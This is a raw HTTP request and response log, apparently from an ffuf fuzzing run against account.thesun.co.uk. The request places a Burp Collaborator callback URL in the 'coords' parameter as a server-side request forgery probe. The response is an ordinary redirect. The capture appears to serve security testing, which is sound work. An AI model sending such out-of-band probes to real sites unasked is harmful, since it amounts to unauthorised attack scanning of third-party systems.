GET /?coords=http://hez0kgfv7rvym98k65ggntsp6gcb00.burpcollaborator.net HTTP/1.1
Host: account.thesun.co.uk
User-Agent: Fuzz Faster U Fool v1.2.0-git
Accept-Encoding: gzip


---- ↑ Request ---- Response ↓ ----

HTTP/1.1 302 Found
Content-Length: 43
Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-transform
Cf-Cache-Status: DYNAMIC
Cf-Ray: 64142ae62a5e5658-SIN
Cf-Request-Id: 09807923dd00005658fb98a000000001
Connection: keep-alive
Content-Type: text/plain; charset=utf-8
Date: Sat, 17 Apr 2021 08:08:48 GMT
Expect-Ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Location: https://thesun.co.uk/
Ot-Baggage-Auth0-Request-Id: 64142ae62a5e5658
Ot-Tracer-Sampled: true
Ot-Tracer-Spanid: 0289d60839a59c65
Ot-Tracer-Traceid: 0ff5a1ea093c7df9
Server: cloudflare
Set-Cookie: __cfduid=d502965cd15301a9ac4b9eb89c5daa1d61618646928; expires=Mon, 17-May-21 08:08:48 GMT; path=/; domain=.account.thesun.co.uk; HttpOnly; SameSite=Lax; Secure
Strict-Transport-Security: max-age=31536000
Vary: Accept, Accept-Encoding
X-Auth0-Requestid: 7c86dd8eb6bbf68cb18f
X-Content-Type-Options: nosniff

Found. Redirecting to https://thesun.co.uk/